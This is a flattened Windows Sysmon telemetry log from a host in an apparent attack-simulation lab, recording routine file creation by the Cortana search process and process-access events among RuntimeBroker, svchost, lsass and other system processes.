13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.867{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-01-18 13:58:34.867 11241100x800000000000000011965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.851{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-01-18 13:58:34.851 11241100x800000000000000011964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.851{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-01-18 13:58:34.851 10341000x800000000000000011963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.773{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.773{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.679{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+14e60|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows
\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.398{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.398{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
